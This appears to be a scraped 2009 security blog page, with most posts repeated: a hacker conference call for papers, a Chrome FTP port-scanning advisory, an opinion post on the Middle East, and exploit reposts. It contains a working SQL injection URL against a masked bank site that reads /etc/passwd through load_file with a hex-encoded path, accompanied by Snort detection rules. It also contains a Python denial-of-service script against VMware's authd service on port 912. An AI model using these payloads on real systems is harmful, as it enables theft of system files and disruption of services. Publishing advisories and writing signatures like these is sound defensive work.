Introduction
uCon will be a totally informal and non-profit conference taking place in Recife, Brazil, in 28th of February 2009 -- three days after the best street carnival ever (also known as the rehearsal of the end of the world).
The conference aims to bring together academics, hackers and information security enthusiasts to share cutting-edge ideas and thoughts about their latest developments and techniques in the field. Attendees will have the opportunity to network with like-minded people during social events, such as lunch break and aftercon party and during the capture the flag competition.
The venue
The conference will be held at Jardins Bar e Restaurante, one of the city's most famous clubs. Its infrastructure includes a very comfortable ballroom with capacity for up to 500 people.
Who?
The usual gang of cretins, the usual suspects.
Topics
uCon committee gives preference to lectures with practical demonstration.
The conference staff will try to provide every equipment needed for the presentation in the case the author cannot provide them.
The following topics include, but are not limited to:
* General system exploitation techniques, vuln-dev and shellcoding
* Web application hacking
* Phone phreaking
* Fuzzing and application security test
* Hardware hacking, embedded systems and other electronic devices
* Mobile devices exploitation, Symbian, P2K and bluetooth technologies
* Analysis of virus, worms and all sorts of malware
* Reverse engineering
* Rootkits
* Security in Wi-Fi and VoIP environments
* Information about smartcard and RFID security and similars
* Technical approach to alternative operating systems
* Denial of service attacks and/or counter-measures
* Techniques for development of secure software and systems
* Security in SCADA and lesser-known environments
* Cryptography
* Information about satellites, GPS and stuff alike
* Lockpicking, trashing and urban exploration
* Internet, privacy and Big Brother
* Information warfare and industrial espionage
Costs
uCon staff tried to keep an affordable price for attendees and the early bird entry price is R$ 60. Registration on-site will cost R$ 80. Lunch, free pass to the aftercon party in Jardins club and access to the workshops are included within the ticket price.
Deadline and submissions
Deadline for proposal submission: 25th of January 2009
Deadline for acceptation: 5th of February 2009
Send your proposal to cfp@ucon-conference.org and make sure to provide along with your submission the following details:
* Speaker name or handle
* A short biography of the presenter
* A brief description about your talk
* Estimated time-length of presentation
* Whether you need visa to enter Brazil or not
* Any technical requirements for your lecture
Unlike the past edition, when speakers could choose how many minutes of presentation time they needed, this time we will have pre-determined time slots of 45 minutes and a block of 5 minutes lightning talks where you can just step up the mic and say whatever you want to say.
Preferrable file format for papers and slides are PDF. If you feel old school enough you can submit them in TXT as well.
Speakers are asked to, but not obligated, hand in slides used in their lectures.
NOTE: Bear in mind if your presentation involves advertisement of products, services or any kind of sales pitches, please do not submit.
Information for speakers
Speakers' privileges are:
* Free pass to the conference
* 15 minutes of fame and glory (just to prove Andy Warhol was right)
* Heavy amounts of alcohol, including caipirinha and assorted booze
* Tour to Porto de Galinhas and other paradise beaches in south shore of Pernambuco
* All the parties money can buy
* We will try our best to cover travelling costs up to USD 750
Other information
For further information please check out our web site http://www.ucon-conference.org it will be updated with everything regarding the conference.
To speak at uCon 2009, please send your proposal to cfp@ucon-conference.org
Monday, January 5, 2009
Sunday, January 4, 2009
Video Section - EvilFingers.com
We have come up with a video section for our users to build/update their skill set. We are coming up with a series of videos on different categories that is not limited to some of the following:
Tools
Process
Procedure/Working
Coding & Testing
Troubleshooting
and other stuff...
If you have comments or concerns, contact us at contact.fingers @ gmail.com
- EF
Tools
Process
Procedure/Working
Coding & Testing
Troubleshooting
and other stuff...
If you have comments or concerns, contact us at contact.fingers @ gmail.com
- EF
Google Chrome FTP PASV IP Malicious Scanning Vulnerability.
---------------------------------------------------
Advisory: Google Chrome FTP PASV IP Malicious Scanning Vulnerability.
Version Affected: Google Chrome: 1.0.154.36
Release Date:
Disclosed: 1 January 2009
Released: 4 January 2009
Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port scanning vulnerability.The username in the FTP (ftp://username:password@domain.com) can be manipulated by tampering it with certain IP address with specification of port as (ftp://xxx.xxx.xxx.xxx-22:password@domain.com).The Google Chrome FTP client make connection to the rogue FTP server which uses PASV commands to scan network.Dynamic requests are issued to a rogue FTP server which accepts connection with different usernames as the IP address with specified ports to locate the non existing object on the target domain. JavaScript Port Scanning is used to exploit this issue. A malicious web page hosted on a specially-coded FTP server could use this feature to perform a generic port-scan of machines inside the firewall of the victim.The generated fraudulent request helps attacker to exhibit internal network information through sustainable port scanning through JavaScript.
Proof-of-Concept:
Click Here
Alternate Link: http://www.secniche.org/gcfpv/
Credit:
Aditya K Sood (Founder, www.Secniche.org / Team Lead, www.EvilFingers.com)
Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---------------------------------------------------
Advisory: Google Chrome FTP PASV IP Malicious Scanning Vulnerability.
Version Affected: Google Chrome: 1.0.154.36
Release Date:
Disclosed: 1 January 2009
Released: 4 January 2009
Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port scanning vulnerability.The username in the FTP (ftp://username:password@domain.com) can be manipulated by tampering it with certain IP address with specification of port as (ftp://xxx.xxx.xxx.xxx-22:password@domain.com).The Google Chrome FTP client make connection to the rogue FTP server which uses PASV commands to scan network.Dynamic requests are issued to a rogue FTP server which accepts connection with different usernames as the IP address with specified ports to locate the non existing object on the target domain. JavaScript Port Scanning is used to exploit this issue. A malicious web page hosted on a specially-coded FTP server could use this feature to perform a generic port-scan of machines inside the firewall of the victim.The generated fraudulent request helps attacker to exhibit internal network information through sustainable port scanning through JavaScript.
Proof-of-Concept:
Click Here
Alternate Link: http://www.secniche.org/gcfpv/
Credit:
Aditya K Sood (Founder, www.Secniche.org / Team Lead, www.EvilFingers.com)
Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---------------------------------------------------
SQLInjection for Bank
Credit for Exploit: Rohit Bansal
Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file
(0x2f6574632f706173737764),5,6,7--
Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT
Countermeasure:
Use the above combination to ensure that your snort signature prevents the attack.
Example(s) on EmergingThreats Format:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
Disclosure: EvilFingers neither guarantee's the exploit nor the signature.
Contact us at Contact.Fingers @ gmail.com for any further questions.
- EF
Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file
(0x2f6574632f706173737764),5,6,7--
Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT
Countermeasure:
Use the above combination to ensure that your snort signature prevents the attack.
Example(s) on EmergingThreats Format:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
Disclosure: EvilFingers neither guarantee's the exploit nor the signature.
Contact us at Contact.Fingers @ gmail.com for any further questions.
- EF
Saturday, January 3, 2009
Crisis in the Middle East
News Agencies call it "Crisis in the Middle East", but is it really "War" or "Terrorism".
NOTE: We are talking from a neutral stand point. We neither support war, nor terrorism.
Some of the questions that could arise in the mind of common people...
(1) How is it that politicians have always played a great role from the days of Caesar?
(2) How is it called "War" when some set of countries initiate, where as when certain others do the same it is called "terrorism"?
(3) Why do the common people of both sides of the war[Winning side, Losing side] have to be affected, for a decision that they were not a part of?
(4) Is this crisis only in middle easy, or is this a "World Crisis"?
(5) Why do neighboring countries become a test bed for newer weapons technology?
(6) Why does UN or International Peace organizations wait for developed nation's response for taking a step into stabilizing such situations?
(7) Why does politics and religion play a major role in war?
(8) Who gave the permission to developed nations to make the decision on "Who is right and who is wrong", "Who can buy or test weapons and who cannot", etc. when they themselves did the same stuff before entering the "Developed" status?
Just thought of sharing some of the questions that a layman can think about in such situations reoccurring in a cyclic fashion. History repeats itself, but it wouldn't be the case if people start thinking wisely [which is almost impossible].
- EF
NOTE: We are talking from a neutral stand point. We neither support war, nor terrorism.
Some of the questions that could arise in the mind of common people...
(1) How is it that politicians have always played a great role from the days of Caesar?
(2) How is it called "War" when some set of countries initiate, where as when certain others do the same it is called "terrorism"?
(3) Why do the common people of both sides of the war[Winning side, Losing side] have to be affected, for a decision that they were not a part of?
(4) Is this crisis only in middle easy, or is this a "World Crisis"?
(5) Why do neighboring countries become a test bed for newer weapons technology?
(6) Why does UN or International Peace organizations wait for developed nation's response for taking a step into stabilizing such situations?
(7) Why does politics and religion play a major role in war?
(8) Who gave the permission to developed nations to make the decision on "Who is right and who is wrong", "Who can buy or test weapons and who cannot", etc. when they themselves did the same stuff before entering the "Developed" status?
Just thought of sharing some of the questions that a layman can think about in such situations reoccurring in a cyclic fashion. History repeats itself, but it wouldn't be the case if people start thinking wisely [which is almost impossible].
- EF
Vmware <= 2.5.1 build-126130 Remote Denial of Service
We just saw a POC for VMWare and it looks pretty cool...we thought of sharing it with our users.
Credits: laurent gaffiƩ
Link: http://www.milw0rm.com/exploits/7647
********START OF PASTE**********
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vmware <= 2.5.1 build-126130 Remote Denial of Service
Application: Vmware
Web Site: http://www.vmware.com/
Platform: Windows *
Bug: Remote Denial of Service
Tested agains: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
================
1) Introduction
================
"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications,
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."
=======
2) Bug
=======
Vmware-authd listen on 0.0.0.0 port 912 on a windows box by default.
A denial of service exist in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service, code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also some old version of this binary (like 6.00.3938.0000) doesn't seems vulnerable to this DoS.
==================
3)Proof of concept
==================
Auth-dos.py :
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "
=====
4)Credits
=====
laurent gaffiƩ
laurent.gaffie{remove_this}[at]gmail[dot]com
# milw0rm.com [2009-01-02]
********END OF PASTE**********
Credits: laurent gaffiƩ
Link: http://www.milw0rm.com/exploits/7647
********START OF PASTE**********
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vmware <= 2.5.1 build-126130 Remote Denial of Service
Application: Vmware
Web Site: http://www.vmware.com/
Platform: Windows *
Bug: Remote Denial of Service
Tested agains: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
================
1) Introduction
================
"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications,
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."
=======
2) Bug
=======
Vmware-authd listen on 0.0.0.0 port 912 on a windows box by default.
A denial of service exist in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service, code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also some old version of this binary (like 6.00.3938.0000) doesn't seems vulnerable to this DoS.
==================
3)Proof of concept
==================
Auth-dos.py :
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "
=====
4)Credits
=====
laurent gaffiƩ
laurent.gaffie{remove_this}[at]gmail[dot]com
# milw0rm.com [2009-01-02]
********END OF PASTE**********
Friday, January 2, 2009
71 Russian Publications released!!!
The beginning of 2009 has given us a good start so far. Thanks to all their our team member's hard work and contribution, we are in the path of attaining a stable community site.
Kris Kaspersky is releasing 71 Russian Articles for our viewers, for them to enjoy 2009 with some good reading. We now have a total of 507 Russian Publications so far and we are expecting some more to be releasing soon.
Do keep us posted if you have any questions or any other stuff. You can always contact us at Contact.fingers @ gmail.com [GMAIL Rocks!!!].
- EF
Kris Kaspersky is releasing 71 Russian Articles for our viewers, for them to enjoy 2009 with some good reading. We now have a total of 507 Russian Publications so far and we are expecting some more to be releasing soon.
Do keep us posted if you have any questions or any other stuff. You can always contact us at Contact.fingers @ gmail.com [GMAIL Rocks!!!].
- EF
Subscribe to:
Posts (Atom)
